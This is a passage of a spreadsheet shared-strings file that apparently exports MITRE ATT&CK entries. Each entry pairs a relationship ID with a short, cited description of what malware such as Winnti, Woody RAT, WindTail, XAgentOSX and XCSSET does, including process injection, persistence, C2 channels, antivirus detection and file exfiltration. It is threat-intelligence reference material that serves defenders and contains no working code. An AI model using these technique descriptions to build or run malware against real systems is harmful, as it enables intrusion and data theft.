  <si>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</si>
  <si>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relationship--b0fee298-25cc-450d-ab7e-a7430c6b3f02</t>
  </si>
  <si>
    <t>[WhisperGate](https://attack.mitre.org/software/S0689) can use `cmd.exe` to execute commands.(Citation: Unit 42 WhisperGate January 2022)</t>
  </si>
  <si>
    <t>relationship--ab503692-c6ff-41ab-995a-e658d098b07b</t>
  </si>
  <si>
    <t>[Wiarp](https://attack.mitre.org/software/S0206) creates a backdoor through which remote attackers can download files.(Citation: Symantec Wiarp May 2012)</t>
  </si>
  <si>
    <t>relationship--0f7e7dc5-ea9c-4d9e-9acd-5fa0dd25910a</t>
  </si>
  <si>
    <t>[Wiarp](https://attack.mitre.org/software/S0206) creates a backdoor through which remote attackers can inject files into running processes.(Citation: Symantec Wiarp May 2012)</t>
  </si>
  <si>
    <t>relationship--66f859b2-4bc2-4520-afd4-8f8a7b71a50c</t>
  </si>
  <si>
    <t>[Wiarp](https://attack.mitre.org/software/S0206) creates a backdoor through which remote attackers can open a command line interface.(Citation: Symantec Wiarp May 2012)</t>
  </si>
  <si>
    <t>relationship--5f0a56f1-f9ef-41c5-a994-fcf499a02b90</t>
  </si>
  <si>
    <t>[Wiarp](https://attack.mitre.org/software/S0206) creates a backdoor through which remote attackers can create a service.(Citation: Symantec Wiarp May 2012)</t>
  </si>
  <si>
    <t>relationship--6a866320-6bfd-4130-941c-bcd888f2ee92</t>
  </si>
  <si>
    <t>[WinMM](https://attack.mitre.org/software/S0059) is usually configured with primary and backup domains for C2 communications.(Citation: Baumgartner Naikon 2015)</t>
  </si>
  <si>
    <t>relationship--70a93fc8-83c0-4407-8224-ae447af1235a</t>
  </si>
  <si>
    <t>[WinMM](https://attack.mitre.org/software/S0059) sets a WH_CBT Windows hook to search for and capture files on the victim.(Citation: Baumgartner Naikon 2015)</t>
  </si>
  <si>
    <t>relationship--1684e405-53bd-4951-a26d-e7c39887b06a</t>
  </si>
  <si>
    <t>[WinMM](https://attack.mitre.org/software/S0059) sets a WH_CBT Windows hook to collect information on process creation.(Citation: Baumgartner Naikon 2015)</t>
  </si>
  <si>
    <t>relationship--13204383-a747-4f7f-a75c-858ddc76beab</t>
  </si>
  <si>
    <t>[WinMM](https://attack.mitre.org/software/S0059) collects the system name, OS version including service pack, and system install date and sends the information to the C2 server.(Citation: Baumgartner Naikon 2015)</t>
  </si>
  <si>
    <t>relationship--2e367a09-1d94-4ea4-984c-a592b769fffa</t>
  </si>
  <si>
    <t>[WinMM](https://attack.mitre.org/software/S0059) uses NetUser-GetInfo to identify that it is running under an “Admin” account on the local system.(Citation: Baumgartner Naikon 2015)</t>
  </si>
  <si>
    <t>relationship--af6e3f9e-7c71-484d-ab8e-5adaaaedea36</t>
  </si>
  <si>
    <t>[WinMM](https://attack.mitre.org/software/S0059) uses HTTP for C2.(Citation: Baumgartner Naikon 2015)</t>
  </si>
  <si>
    <t>relationship--9df1a5b0-f1fb-4239-abb5-67ba6e9e05f6</t>
  </si>
  <si>
    <t>[WindTail](https://attack.mitre.org/software/S0466) has the ability to use the macOS built-in zip utility to archive files.(Citation: objective-see windtail2 jan 2019)</t>
  </si>
  <si>
    <t>relationship--9284f651-5078-4b67-90dd-841397029edd</t>
  </si>
  <si>
    <t>04 June 2020</t>
  </si>
  <si>
    <t>[WindTail](https://attack.mitre.org/software/S0466) can identify and add files that possess specific file extensions to an array for archiving.(Citation: objective-see windtail2 jan 2019)</t>
  </si>
  <si>
    <t>relationship--7a6c1581-a077-4c8f-8111-3264fa9e1e9c</t>
  </si>
  <si>
    <t>[WindTail](https://attack.mitre.org/software/S0466) has the ability to decrypt strings using hard-coded AES keys.(Citation: objective-see windtail1 dec 2018)</t>
  </si>
  <si>
    <t>relationship--b4016d43-d8c4-4ca2-b119-0681ebe8aaff</t>
  </si>
  <si>
    <t>[WindTail](https://attack.mitre.org/software/S0466) has the ability to automatically exfiltrate files using the macOS built-in utility /usr/bin/curl.(Citation: objective-see windtail2 jan 2019)</t>
  </si>
  <si>
    <t>relationship--d811dad0-a813-4293-81fc-55e8ea6a54be</t>
  </si>
  <si>
    <t>[WindTail](https://attack.mitre.org/software/S0466) has the ability to receive and execute a self-delete command.(Citation: objective-see windtail2 jan 2019)</t>
  </si>
  <si>
    <t>relationship--d0f83de0-975e-4cc2-8423-e91549f952d9</t>
  </si>
  <si>
    <t>[WindTail](https://attack.mitre.org/software/S0466) has the ability to enumerate the users home directory and the path to its own application bundle.(Citation: objective-see windtail1 dec 2018)(Citation: objective-see windtail2 jan 2019)</t>
  </si>
  <si>
    <t>relationship--1fe64d85-29ca-4cf0-9b30-8d41ebad37fc</t>
  </si>
  <si>
    <t>[WindTail](https://attack.mitre.org/software/S0466) can instruct the OS to execute an application without a dock icon or menu.(Citation: objective-see windtail1 dec 2018)</t>
  </si>
  <si>
    <t>relationship--ec5259f2-5a6c-4d42-bf21-f91c2df64f61</t>
  </si>
  <si>
    <t>[WindTail](https://attack.mitre.org/software/S0466) has been incompletely signed with revoked certificates.(Citation: objective-see windtail1 dec 2018)</t>
  </si>
  <si>
    <t>relationship--0c837763-c44c-45cc-8c44-332667481a31</t>
  </si>
  <si>
    <t>[WindTail](https://attack.mitre.org/software/S0466) has used icons mimicking MS Office files to mask payloads.(Citation: objective-see windtail1 dec 2018)</t>
  </si>
  <si>
    <t>relationship--81603db2-a657-4716-a7ca-e6562799e98e</t>
  </si>
  <si>
    <t>[WindTail](https://attack.mitre.org/software/S0466) can invoke Apple APIs &lt;code&gt;contentsOfDirectoryAtPath&lt;/code&gt;, &lt;code&gt;pathExtension&lt;/code&gt;, and (string) &lt;code&gt;compare&lt;/code&gt;.(Citation: objective-see windtail2 jan 2019)</t>
  </si>
  <si>
    <t>relationship--1e669c57-11e8-4088-904c-84940458be8e</t>
  </si>
  <si>
    <t>[WindTail](https://attack.mitre.org/software/S0466) can be delivered as a compressed, encrypted, and encoded payload.(Citation: objective-see windtail2 jan 2019)</t>
  </si>
  <si>
    <t>relationship--4642135b-65d9-4b61-b25c-648c674c02dc</t>
  </si>
  <si>
    <t>[WindTail](https://attack.mitre.org/software/S0466) has the ability to generate the current date and time.(Citation: objective-see windtail1 dec 2018)</t>
  </si>
  <si>
    <t>relationship--ff019484-a6dc-4250-a9eb-9094f5c9d30f</t>
  </si>
  <si>
    <t>[WindTail](https://attack.mitre.org/software/S0466) can use the &lt;code&gt;open&lt;/code&gt; command to execute an application.(Citation: objective-see windtail1 dec 2018)</t>
  </si>
  <si>
    <t>relationship--6b4a458b-d87a-4dc4-a375-46f4c1e6449a</t>
  </si>
  <si>
    <t>[WindTail](https://attack.mitre.org/software/S0466) has the ability to use HTTP for C2 communications.(Citation: objective-see windtail2 jan 2019)</t>
  </si>
  <si>
    <t>relationship--5b8e36dd-264d-45dc-ab38-500b5eb17c33</t>
  </si>
  <si>
    <t>[Windows Credential Editor](https://attack.mitre.org/software/S0005) can dump credentials.(Citation: Amplia WCE)</t>
  </si>
  <si>
    <t>relationship--935971d6-0af2-4683-971a-9acb523733fe</t>
  </si>
  <si>
    <t>[Winexe](https://attack.mitre.org/software/S0191) installs a service on the remote system, executes the command, then uninstalls the service.(Citation: Secpod Winexe June 2017)</t>
  </si>
  <si>
    <t>relationship--5765c7d1-884f-4d6d-a938-4a92c86a9e21</t>
  </si>
  <si>
    <t>[Wingbird](https://attack.mitre.org/software/S0176) side loads a malicious file, sspisrv.dll, in part of a spoofed lssas.exe service.(Citation: Microsoft SIR Vol 21)(Citation: Microsoft Wingbird Nov 2017)</t>
  </si>
  <si>
    <t>relationship--1bbb499c-81c8-4e94-8305-86b199e8298b</t>
  </si>
  <si>
    <t>[Wingbird](https://attack.mitre.org/software/S0176) exploits CVE-2016-4117 to allow an executable to gain escalated privileges.(Citation: Microsoft SIR Vol 21)</t>
  </si>
  <si>
    <t>relationship--dbccbeab-26c9-476e-b529-c193f9796cbc</t>
  </si>
  <si>
    <t>[Wingbird](https://attack.mitre.org/software/S0176) deletes its payload along with the payload's parent process after it finishes copying files.(Citation: Microsoft SIR Vol 21)</t>
  </si>
  <si>
    <t>relationship--2e5039ef-913f-4808-9685-32f64f4dbf49</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</si>
  <si>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</si>
  <si>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relationship--019eb3cf-35df-4109-a006-1b91331866c3</t>
  </si>
  <si>
    <t>[Wingbird](https://attack.mitre.org/software/S0176) performs multiple process injections to hijack system processes and execute malicious code.(Citation: Microsoft SIR Vol 21)</t>
  </si>
  <si>
    <t>relationship--e7baabf7-9300-432d-aa78-000ac099d4d3</t>
  </si>
  <si>
    <t>[Wingbird](https://attack.mitre.org/software/S0176) checks for the presence of Bitdefender security software.(Citation: Microsoft SIR Vol 21)</t>
  </si>
  <si>
    <t>relationship--b1371fd9-1bfd-40b2-90a2-4876d89029bf</t>
  </si>
  <si>
    <t>[Wingbird](https://attack.mitre.org/software/S0176) uses services.exe to register a new autostart service named "Audit Service" using a copy of the local lsass.exe file.(Citation: Microsoft SIR Vol 21)(Citation: Microsoft Wingbird Nov 2017)</t>
  </si>
  <si>
    <t>relationship--91ca1017-0b33-4fa1-a61f-b3dae24c7e40</t>
  </si>
  <si>
    <t>[Wingbird](https://attack.mitre.org/software/S0176) checks the victim OS version after executing to determine where to drop files based on whether the victim is 32-bit or 64-bit.(Citation: Microsoft SIR Vol 21)</t>
  </si>
  <si>
    <t>relationship--fe786b29-e621-48e2-84b5-aed35e6930fe</t>
  </si>
  <si>
    <t>relationship--a8aac75d-ef58-4dda-97a8-9584a6a6baaf</t>
  </si>
  <si>
    <t>[Winnti for Linux](https://attack.mitre.org/software/S0430) has decoded XOR encoded strings holding its configuration upon execution.(Citation: Chronicle Winnti for Linux May 2019)</t>
  </si>
  <si>
    <t>relationship--45e9de66-7203-48e9-bd9b-096c289f35db</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</si>
  <si>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</si>
  <si>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relationship--90925137-7ffe-46d6-82d4-0ad7748740a3</t>
  </si>
  <si>
    <t>[Winnti for Linux](https://attack.mitre.org/software/S0430) has used ICMP, custom TCP, and UDP in outbound communications.(Citation: Chronicle Winnti for Linux May 2019)</t>
  </si>
  <si>
    <t>relationship--40622bce-ea51-4744-9240-4a4c4bf83753</t>
  </si>
  <si>
    <t>[Winnti for Linux](https://attack.mitre.org/software/S0430) can encode its configuration file with single-byte XOR encoding.(Citation: Chronicle Winnti for Linux May 2019)</t>
  </si>
  <si>
    <t>relationship--7dfa8cdd-102c-4ea6-9fe0-d2e76b688221</t>
  </si>
  <si>
    <t>[Winnti for Linux](https://attack.mitre.org/software/S0430) has used a modified copy of the open-source userland rootkit Azazel, named libxselinux.so, to hide the malware's operations and network activity.(Citation: Chronicle Winnti for Linux May 2019)</t>
  </si>
  <si>
    <t>relationship--c85d86c0-8adc-42fc-b7c9-8ca33d9ac4b6</t>
  </si>
  <si>
    <t>[Winnti for Linux](https://attack.mitre.org/software/S0430) has used a custom TCP protocol with four-byte XOR for command and control (C2).(Citation: Chronicle Winnti for Linux May 2019)</t>
  </si>
  <si>
    <t>relationship--670d65e8-59a9-46ae-bdb6-6cb94a0528ba</t>
  </si>
  <si>
    <t>[Winnti for Linux](https://attack.mitre.org/software/S0430) has used a passive listener, capable of identifying a specific magic value before executing tasking, as a secondary command and control (C2) mechanism.(Citation: Chronicle Winnti for Linux May 2019)</t>
  </si>
  <si>
    <t>relationship--76625152-3f62-4a1e-a769-5503811b0276</t>
  </si>
  <si>
    <t>[Winnti for Linux](https://attack.mitre.org/software/S0430) has used HTTP in outbound communications.(Citation: Chronicle Winnti for Linux May 2019)</t>
  </si>
  <si>
    <t>relationship--2fc3c031-8a39-4bc9-b3e1-4c5f6ac1e292</t>
  </si>
  <si>
    <t>[Winnti for Windows](https://attack.mitre.org/software/S0141) can use a variant of the sysprep UAC bypass.(Citation: Novetta Winnti April 2015)</t>
  </si>
  <si>
    <t>relationship--745d3440-ecdb-4e3f-b9e6-b4484bb6c465</t>
  </si>
  <si>
    <t>The [Winnti for Windows](https://attack.mitre.org/software/S0141) dropper can decrypt and decompresses a data blob.(Citation: Novetta Winnti April 2015)</t>
  </si>
  <si>
    <t>relationship--d99ad754-c9fa-4244-b4fa-69a0b2191e24</t>
  </si>
  <si>
    <t>The [Winnti for Windows](https://attack.mitre.org/software/S0141) dropper component can verify the existence of a single command line parameter and either terminate if it is not found or later use it as a decryption key.(Citation: Novetta Winnti April 2015)</t>
  </si>
  <si>
    <t>relationship--f74ed982-fc1d-4c6b-945c-52c5e8f13fce</t>
  </si>
  <si>
    <t>The [Winnti for Windows](https://attack.mitre.org/software/S0141) HTTP/S C2 mode can make use of an external proxy.(Citation: Novetta Winnti April 2015)</t>
  </si>
  <si>
    <t>relationship--2fadf189-bdcf-44b8-933a-ca6188485058</t>
  </si>
  <si>
    <t>[Winnti for Windows](https://attack.mitre.org/software/S0141) can delete the DLLs for its various components from a compromised host.(Citation: Novetta Winnti April 2015)</t>
  </si>
  <si>
    <t>relationship--b18c763f-7e8a-43bd-bf67-6c0cc5ac4ab3</t>
  </si>
  <si>
    <t>[Winnti for Windows](https://attack.mitre.org/software/S0141) can check for the presence of specific files prior to moving to the next phase of execution.(Citation: Novetta Winnti April 2015)</t>
  </si>
  <si>
    <t>relationship--1a4f5197-ec9f-4607-984c-4a09978acd8e</t>
  </si>
  <si>
    <t>The [Winnti for Windows](https://attack.mitre.org/software/S0141) dropper can place malicious payloads on targeted systems.(Citation: Novetta Winnti April 2015)</t>
  </si>
  <si>
    <t>relationship--ace0d0ba-7ee5-46cd-be08-2b33d217a13d</t>
  </si>
  <si>
    <t>The [Winnti for Windows](https://attack.mitre.org/software/S0141) HTTP/S C2 mode can make use of a local proxy.(Citation: Novetta Winnti April 2015)</t>
  </si>
  <si>
    <t>relationship--62f3aaef-917b-42fa-9fe9-e21f674caa90</t>
  </si>
  <si>
    <t>A [Winnti for Windows](https://attack.mitre.org/software/S0141) implant file was named ASPNET_FILTER.DLL, mimicking the legitimate ASP.NET ISAPI filter DLL with the same name.(Citation: Microsoft Winnti Jan 2017)</t>
  </si>
  <si>
    <t>relationship--e7b5511a-3528-48d1-9224-6c5ff88b3825</t>
  </si>
  <si>
    <t>[Winnti for Windows](https://attack.mitre.org/software/S0141) can use Native API to create a new process and to start services.(Citation: Novetta Winnti April 2015)</t>
  </si>
  <si>
    <t>relationship--019e35b8-cec3-45e0-b297-19dca59b3190</t>
  </si>
  <si>
    <t>[Winnti for Windows](https://attack.mitre.org/software/S0141) can communicate using custom TCP.(Citation: Novetta Winnti April 2015)</t>
  </si>
  <si>
    <t>relationship--4fb5c14c-5a08-4116-bbb7-d6822649dfa0</t>
  </si>
  <si>
    <t>[Winnti for Windows](https://attack.mitre.org/software/S0141) has the ability to encrypt and compress its payload.(Citation: Novetta Winnti April 2015)</t>
  </si>
  <si>
    <t>relationship--d7f5c7fe-5d4a-4f1e-a5a3-adf02f8699ec</t>
  </si>
  <si>
    <t>[Winnti for Windows](https://attack.mitre.org/software/S0141) can check if the explorer.exe process is responsible for calling its install function.(Citation: Novetta Winnti April 2015)</t>
  </si>
  <si>
    <t>relationship--563e67ee-9cc8-4f44-9d3a-3611e19a1a3c</t>
  </si>
  <si>
    <t>[Winnti for Windows](https://attack.mitre.org/software/S0141) can add a service named &lt;code&gt;wind0ws&lt;/code&gt; to the Registry to achieve persistence after reboot.(Citation: Novetta Winnti April 2015)</t>
  </si>
  <si>
    <t>relationship--5bd58ef1-ad36-47ac-91e5-4e7df618dd87</t>
  </si>
  <si>
    <t>The [Winnti for Windows](https://attack.mitre.org/software/S0141) installer loads a DLL using rundll32.(Citation: Microsoft Winnti Jan 2017)(Citation: Novetta Winnti April 2015)</t>
  </si>
  <si>
    <t>relationship--6b11697f-be6c-4cd7-b445-4d277a8d7346</t>
  </si>
  <si>
    <t>[Winnti for Windows](https://attack.mitre.org/software/S0141) can run as a service using svchost.exe.(Citation: Novetta Winnti April 2015)</t>
  </si>
  <si>
    <t>relationship--9aebe474-f443-4007-bb8d-dc7c9f22d5f9</t>
  </si>
  <si>
    <t>[Winnti for Windows](https://attack.mitre.org/software/S0141) can XOR encrypt C2 traffic.(Citation: Novetta Winnti April 2015)</t>
  </si>
  <si>
    <t>relationship--1a20c3db-a33c-4129-9fad-3f5605c0cbcb</t>
  </si>
  <si>
    <t>[Winnti for Windows](https://attack.mitre.org/software/S0141) can determine if the OS on a compromised host is newer than Windows XP.(Citation: Novetta Winnti April 2015)</t>
  </si>
  <si>
    <t>relationship--905c6670-b81e-40c1-b84d-8359ffc2dcc1</t>
  </si>
  <si>
    <t>[Winnti for Windows](https://attack.mitre.org/software/S0141) can set the timestamps for its worker and service components to match that of cmd.exe.(Citation: Novetta Winnti April 2015)</t>
  </si>
  <si>
    <t>relationship--bf833c53-a60f-4e92-92b4-9987334e7f85</t>
  </si>
  <si>
    <t>[Winnti for Windows](https://attack.mitre.org/software/S0141) has the ability to use encapsulated HTTP/S in C2 communications.(Citation: Novetta Winnti April 2015)</t>
  </si>
  <si>
    <t>relationship--dc40e665-d4fd-4e44-a101-efe4c1d950e0</t>
  </si>
  <si>
    <t>[Winnti for Windows](https://attack.mitre.org/software/S0141) sets its DLL file as a new service in the Registry to establish persistence.(Citation: Microsoft Winnti Jan 2017)</t>
  </si>
  <si>
    <t>relationship--0a65c303-52a6-4624-a8fb-fc7448429139</t>
  </si>
  <si>
    <t>S0041</t>
  </si>
  <si>
    <t>Wiper</t>
  </si>
  <si>
    <t>malware--a19c49aa-36fe-4c05-b817-23e1c7a7d085</t>
  </si>
  <si>
    <t>It is believed that a patch management system for an anti-virus product commonly installed among targeted companies was used to distribute the [Wiper](https://attack.mitre.org/software/S0041) malware.(Citation: Dell Wiper)</t>
  </si>
  <si>
    <t>relationship--82268341-e0a8-4937-8618-351e147daa0c</t>
  </si>
  <si>
    <t>S1065</t>
  </si>
  <si>
    <t>Woody RAT</t>
  </si>
  <si>
    <t>malware--3bc7e862-5610-4c02-9c48-15b2e2dc1ddb</t>
  </si>
  <si>
    <t>[Woody RAT](https://attack.mitre.org/software/S1065) can identify administrator accounts on an infected machine.(Citation: MalwareBytes WoodyRAT Aug 2022)</t>
  </si>
  <si>
    <t>relationship--642039f8-984e-432d-a6a3-bc6b4469bba0</t>
  </si>
  <si>
    <t xml:space="preserve">[Woody RAT](https://attack.mitre.org/software/S1065) can use RSA-4096 to encrypt data sent to its C2 server.(Citation: MalwareBytes WoodyRAT Aug 2022) </t>
  </si>
  <si>
    <t>relationship--8989ead1-c778-4645-8d95-2d42d875788b</t>
  </si>
  <si>
    <t>[Woody RAT](https://attack.mitre.org/software/S1065) can collect information from a compromised host.(Citation: MalwareBytes WoodyRAT Aug 2022)</t>
  </si>
  <si>
    <t>relationship--71bc9a2e-4536-4b84-9997-126cc4c065bf</t>
  </si>
  <si>
    <t>[Woody RAT](https://attack.mitre.org/software/S1065) can deobfuscate Base64-encoded strings and scripts.(Citation: MalwareBytes WoodyRAT Aug 2022)</t>
  </si>
  <si>
    <t>relationship--883822b2-c788-4a60-b9ad-e73e363b1ea6</t>
  </si>
  <si>
    <t xml:space="preserve">[Woody RAT](https://attack.mitre.org/software/S1065) can exfiltrate files from an infected machine to its C2 server.(Citation: MalwareBytes WoodyRAT Aug 2022) </t>
  </si>
  <si>
    <t>relationship--344bbf55-0316-49d0-a5ab-c5f79d218908</t>
  </si>
  <si>
    <t>[Woody RAT](https://attack.mitre.org/software/S1065) has relied on CVE-2022-30190 (Follina) for execution during delivery.(Citation: MalwareBytes WoodyRAT Aug 2022)</t>
  </si>
  <si>
    <t>relationship--dac35c07-4a4a-4924-a702-09e5cf988349</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</si>
  <si>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</si>
  <si>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relationship--8b714bbe-2a8e-4673-b840-ca5e93a57b1d</t>
  </si>
  <si>
    <t xml:space="preserve">[Woody RAT](https://attack.mitre.org/software/S1065) can list all files and their associated attributes, including filename, type, owner, creation time, last access time, last write time, size, and permissions.(Citation: MalwareBytes WoodyRAT Aug 2022) </t>
  </si>
  <si>
    <t>relationship--06ab6825-89f4-4bb7-8c82-ae9a5d4cdf61</t>
  </si>
  <si>
    <t>[Woody RAT](https://attack.mitre.org/software/S1065) has suppressed all error reporting by calling `SetErrorMode` with 0x8007 as a parameter.(Citation: MalwareBytes WoodyRAT Aug 2022)</t>
  </si>
  <si>
    <t>relationship--43cc0c46-bec4-472c-9d22-8345bcd199df</t>
  </si>
  <si>
    <t xml:space="preserve">[Woody RAT](https://attack.mitre.org/software/S1065) can download files from its C2 server, including the .NET DLLs, `WoodySharpExecutor` and `WoodyPowerSession`.(Citation: MalwareBytes WoodyRAT Aug 2022) </t>
  </si>
  <si>
    <t>relationship--88e52860-d4cc-485a-b23f-ad2cda301727</t>
  </si>
  <si>
    <t>[Woody RAT](https://attack.mitre.org/software/S1065) can make `Ping` GET HTTP requests to its C2 server at regular intervals for network connectivity checks.(Citation: MalwareBytes WoodyRAT Aug 2022)</t>
  </si>
  <si>
    <t>relationship--a06f76b9-1920-4660-a2f3-cc0db8d585c0</t>
  </si>
  <si>
    <t>[Woody RAT](https://attack.mitre.org/software/S1065) has relied on users opening a malicious email attachment for execution.(Citation: MalwareBytes WoodyRAT Aug 2022)</t>
  </si>
  <si>
    <t>relationship--a6d53c2b-a2d2-4ad6-a61b-b8c88927d66a</t>
  </si>
  <si>
    <t xml:space="preserve">[Woody RAT](https://attack.mitre.org/software/S1065) can use multiple native APIs, including `WriteProcessMemory`, `CreateProcess`, and `CreateRemoteThread` for process injection.(Citation: MalwareBytes WoodyRAT Aug 2022)  </t>
  </si>
  <si>
    <t>relationship--b2191a9b-4963-4fc1-8056-75908795a1af</t>
  </si>
  <si>
    <t>[Woody RAT](https://attack.mitre.org/software/S1065) has used Base64 encoded strings and scripts.(Citation: MalwareBytes WoodyRAT Aug 2022)</t>
  </si>
  <si>
    <t>relationship--374d1cee-7c9c-4b3b-8e75-8a5c4caf9d47</t>
  </si>
  <si>
    <t xml:space="preserve">[Woody RAT](https://attack.mitre.org/software/S1065) can execute PowerShell commands and scripts with the use of .NET DLL, `WoodyPowerSession`.(Citation: MalwareBytes WoodyRAT Aug 2022) </t>
  </si>
  <si>
    <t>relationship--31728aa8-de3d-4edd-8c39-3d9d3091341a</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</si>
  <si>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</si>
  <si>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relationship--368510dc-1050-45df-81f2-1fca6118c2b0</t>
  </si>
  <si>
    <t xml:space="preserve">[Woody RAT](https://attack.mitre.org/software/S1065) can create a suspended notepad process and write shellcode to delete a file into the suspended process using `NtWriteVirtualMemory`.(Citation: MalwareBytes WoodyRAT Aug 2022) </t>
  </si>
  <si>
    <t>relationship--1fdf1686-f498-460a-8948-a5ca46f52b62</t>
  </si>
  <si>
    <t xml:space="preserve">[Woody RAT](https://attack.mitre.org/software/S1065) can inject code into a targeted process by writing to the remote memory of an infected system and then create a remote thread.(Citation: MalwareBytes WoodyRAT Aug 2022) </t>
  </si>
  <si>
    <t>relationship--90e6cb2a-55c4-4533-bbdc-b8eed2132344</t>
  </si>
  <si>
    <t>[Woody RAT](https://attack.mitre.org/software/S1065) can search registry keys to identify antivirus programs on an compromised host.(Citation: MalwareBytes WoodyRAT Aug 2022)</t>
  </si>
  <si>
    <t>relationship--e611b2ca-ecb4-47f4-acc2-614d37926d5b</t>
  </si>
  <si>
    <t xml:space="preserve">[Woody RAT](https://attack.mitre.org/software/S1065) has the ability to take a screenshot of the infected host desktop using Windows GDI+.(Citation: MalwareBytes WoodyRAT Aug 2022) </t>
  </si>
  <si>
    <t>relationship--85fda77f-5129-4de7-bc44-f81ccc46f6d9</t>
  </si>
  <si>
    <t>[Woody RAT](https://attack.mitre.org/software/S1065) can detect Avast Software, Doctor Web, Kaspersky, AVG, ESET, and Sophos antivirus programs.(Citation: MalwareBytes WoodyRAT Aug 2022)</t>
  </si>
  <si>
    <t>relationship--5d2cc737-7cbc-476f-afbe-a8fafa7043fe</t>
  </si>
  <si>
    <t>[Woody RAT](https://attack.mitre.org/software/S1065) can collect .NET, PowerShell, and Python information from an infected host.(Citation: MalwareBytes WoodyRAT Aug 2022)</t>
  </si>
  <si>
    <t>relationship--f372cb23-0736-4cbb-8ba0-3388599226f9</t>
  </si>
  <si>
    <t>[Woody RAT](https://attack.mitre.org/software/S1065) has been delivered via malicious Word documents and archive files.(Citation: MalwareBytes WoodyRAT Aug 2022)</t>
  </si>
  <si>
    <t>relationship--9e92ab98-b547-4206-8158-a186f7570550</t>
  </si>
  <si>
    <t xml:space="preserve">[Woody RAT](https://attack.mitre.org/software/S1065) can use AES-CBC to encrypt data sent to its C2 server.(Citation: MalwareBytes WoodyRAT Aug 2022) </t>
  </si>
  <si>
    <t>relationship--fa50bbff-2f2f-47a8-b295-588e61b76a77</t>
  </si>
  <si>
    <t>[Woody RAT](https://attack.mitre.org/software/S1065) can retrieve the following information from an infected machine: OS, architecture, computer name, OS build version, environment variables, and storage drives.(Citation: MalwareBytes WoodyRAT Aug 2022)</t>
  </si>
  <si>
    <t>relationship--303ff42e-09fa-49ab-9fa3-420aedb090dc</t>
  </si>
  <si>
    <t>[Woody RAT](https://attack.mitre.org/software/S1065) can retrieve network interface and proxy information.(Citation: MalwareBytes WoodyRAT Aug 2022)</t>
  </si>
  <si>
    <t>relationship--c9e36653-29fe-4430-b022-cbc855a85f9d</t>
  </si>
  <si>
    <t>[Woody RAT](https://attack.mitre.org/software/S1065) can retrieve a list of user accounts and usernames from an infected machine.(Citation: MalwareBytes WoodyRAT Aug 2022)</t>
  </si>
  <si>
    <t>relationship--147cd553-fd25-46ea-83ed-594cdb82c440</t>
  </si>
  <si>
    <t>[Woody RAT](https://attack.mitre.org/software/S1065) can communicate with its C2 server using HTTP requests.(Citation: MalwareBytes WoodyRAT Aug 2022)</t>
  </si>
  <si>
    <t>relationship--9e47155f-7b98-4fc5-84b3-01bd70418b8e</t>
  </si>
  <si>
    <t>[Woody RAT](https://attack.mitre.org/software/S1065) can execute commands using `cmd.exe`.(Citation: MalwareBytes WoodyRAT Aug 2022)</t>
  </si>
  <si>
    <t>relationship--1c0acd9f-d536-47ec-9473-5d2a5e5dde73</t>
  </si>
  <si>
    <t>[XAgentOSX](https://attack.mitre.org/software/S0161) contains the getFirefoxPassword function to attempt to locate Firefox passwords.(Citation: XAgentOSX 2017)</t>
  </si>
  <si>
    <t>relationship--b9e2fac9-fc1a-4e13-ac68-1a5796b04d72</t>
  </si>
  <si>
    <t>[XAgentOSX](https://attack.mitre.org/software/S0161) contains the deletFileFromPath function to delete a specified file using the NSFileManager:removeFileAtPath method.(Citation: XAgentOSX 2017)</t>
  </si>
  <si>
    <t>relationship--f5fee3da-a3ef-4a81-a70c-9660ab1fb3d6</t>
  </si>
  <si>
    <t>[XAgentOSX](https://attack.mitre.org/software/S0161) contains the ftpUpload function to use the FTPManager:uploadFile method to upload files from the target system.(Citation: XAgentOSX 2017)</t>
  </si>
  <si>
    <t>relationship--785abba4-fdb4-4aad-9049-5a0c748cc965</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</si>
  <si>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</si>
  <si>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relationship--63a7bbf6-bb2e-41e7-8893-c3f7f207a7a7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</si>
  <si>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</si>
  <si>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relationship--11ed82c1-88af-4c23-860e-185505389288</t>
  </si>
  <si>
    <t>[XAgentOSX](https://attack.mitre.org/software/S0161) contains the execFile function to execute a specified file on the system using the NSTask:launch method.(Citation: XAgentOSX 2017)</t>
  </si>
  <si>
    <t>relationship--fc4811c4-103b-48b7-9e52-20d574cfc4bf</t>
  </si>
  <si>
    <t>[XAgentOSX](https://attack.mitre.org/software/S0161) contains the getProcessList function to run &lt;code&gt;ps aux&lt;/code&gt; to get running processes.(Citation: XAgentOSX 2017)</t>
  </si>
  <si>
    <t>relationship--bb005145-438c-4fd8-9cac-a636df7465da</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</si>
  <si>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</si>
  <si>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relationship--c0223316-4b0b-461e-8947-01c0f5baeef2</t>
  </si>
  <si>
    <t>[XAgentOSX](https://attack.mitre.org/software/S0161) contains the getInstalledAPP function to run &lt;code&gt;ls -la /Applications&lt;/code&gt; to gather what applications are installed.(Citation: XAgentOSX 2017)</t>
  </si>
  <si>
    <t>relationship--ec362b37-1a64-4b28-8d34-7819d0aa5b2a</t>
  </si>
  <si>
    <t>[XAgentOSX](https://attack.mitre.org/software/S0161) contains the getInfoOSX function to return the OS X version as well as the current user.(Citation: XAgentOSX 2017)</t>
  </si>
  <si>
    <t>relationship--31cd4eb1-f7b3-4030-b087-388d55faba03</t>
  </si>
  <si>
    <t>S0658</t>
  </si>
  <si>
    <t>XCSSET</t>
  </si>
  <si>
    <t>malware--e14085cb-0e8d-4be6-92ba-e3b93ee5978f</t>
  </si>
  <si>
    <t>[XCSSET](https://attack.mitre.org/software/S0658) attempts to discover accounts from various locations such as a user's Evernote, AppleID, Telegram, Skype, and WeChat data.(Citation: trendmicro xcsset xcode project 2020)</t>
  </si>
  <si>
    <t>relationship--e481bd6a-3143-4fd6-b1d9-97d1060f423d</t>
  </si>
  <si>
    <t>[XCSSET](https://attack.mitre.org/software/S0658) will compress entire &lt;code&gt;~/Desktop&lt;/code&gt; folders excluding all &lt;code&gt;.git&lt;/code&gt; folders, but only if the total data size is under 200MB.(Citation: trendmicro xcsset xcode project 2020)</t>
  </si>
  <si>
    <t>relationship--7bbd6131-24cd-437e-8057-02f84b357cbe</t>
  </si>
  <si>
    <t>[XCSSET](https://attack.mitre.org/software/S0658) uses a malicious browser application to replace the legitimate browser in order to continuously capture credentials, monitor web traffic, and download additional modules.(Citation: trendmicro xcsset xcode project 2020)</t>
  </si>
  <si>
    <t>relationship--e2e10525-62f5-42ba-a923-ed29cfb4040e</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</si>
  <si>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</si>
  <si>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relationship--55a9fab0-30f8-45f5-b48d-7edbd961404d</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</si>
  <si>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</si>
  <si>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relationship--cb043548-a193-4ade-b69d-d83e3378d255</t>
  </si>
  <si>
